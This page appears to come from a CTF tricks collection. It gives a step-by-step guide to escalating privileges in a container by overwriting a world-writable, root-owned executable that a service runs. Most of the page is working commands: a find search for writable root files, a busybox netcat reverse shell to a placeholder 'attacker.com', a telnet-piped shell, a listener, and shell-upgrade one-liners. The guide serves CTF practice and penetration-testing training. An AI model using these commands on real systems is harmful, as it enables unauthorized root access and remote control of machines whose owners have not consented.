> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/container/trick-0023.md).

# Container PE via Writable Root Executable Service

***

Identify processes running as root or other privileged users to find potential targets.

```bash
ps aux
```

Check the permissions of the executables identified in the process list. Look for root-owned files that are world-writable (the 'w' bit in the third permission triplet). If you find a script that is owned by root but is writable by anyone, you can add your own malicious code in that script that will escalate your privileges when the script is run as root.

```bash
ls -la <path_to_executable>
```

Alternatively, you can use the `find` command to locate root-owned files with world-writable permissions.

```bash
find / -perm -2 -user root -print 2>/dev/null
```

If a root-owned executable is world-writable, replace its content with your desired binary. Ensure your replacement binary is available in a writable location like `/tmp`. BusyBox may contain many UNIX utilities; you can run `busybox --list-full` to check what utilities are supported.

For example, `your_shell_binary` could be a script that uses `busybox` to establish a shell.

To spawn an interactive system shell if the context allows, `your_shell_binary` (e.g., `/tmp/get_shell.sh`) could contain:

```bash
#!/bin/sh
# Ensure busybox is accessible, e.g., /usr/bin/busybox or /tmp/busybox
busybox sh
```

Other BusyBox shells like `busybox ash`, `busybox bash`, `busybox ksh`, or `busybox zsh` might also be available and usable depending on the BusyBox build. This can be used to break out from restricted environments by spawning an interactive system shell.

Alternatively, to get a reverse shell, `/tmp/your_shell_binary` (e.g., `/tmp/reverse_shell.sh`) could contain:

```bash
#!/bin/sh
# Ensure busybox is accessible
RHOST=attacker.com
RPORT=12345
busybox nc -e /bin/sh $RHOST $RPORT
```

You could also try `/bin/bash` if it's available:

```bash
busybox nc -e /bin/bash $RHOST $RPORT
```

Another method using telnet might be:

```bash
busybox telnet <IP> <PORT> | busybox sh
```

Make this script executable: `chmod +x /tmp/your_shell_binary`. On the attacker's machine, you would need to set up a listener to receive the shell:

```bash
nc -lvp 12345
```

Then, copy your prepared binary or script to the target executable's path:

```bash
cp /tmp/your_shell_binary /path/to/world_writable_executable
```

Finally, trigger the service or scheduled task that runs the overwritten executable. For the example in the notes, this involved connecting to a telnet service.

```bash
nc <target_ip> <service_port>
```

The next time the service executes the file, it will run your binary with the service's privileges (likely root). If you've gained a shell, it might be a non-interactive reverse shell. You may need to upgrade it to a fully interactive TTY shell. Here are a few methods:

Using Python:

```python
python -c 'import pty; pty.spawn("/bin/sh")'
```

or

```python
python -c 'import pty; pty.spawn("/bin/bash")'
```

Using `sh`:

```bash
/bin/sh -i
```

Using `bash`:

```bash
/bin/bash -i
```

Using Perl:

```perl
perl -e 'exec "/bin/sh";'
```

Using `script`:

```bash
script /dev/null -c bash
```

After obtaining a shell, you might need to make it fully interactive, especially for tasks like using `su` or `sudo`. You can try the following commands:

```bash
stty raw -echo
reset
export TERM=xterm
```
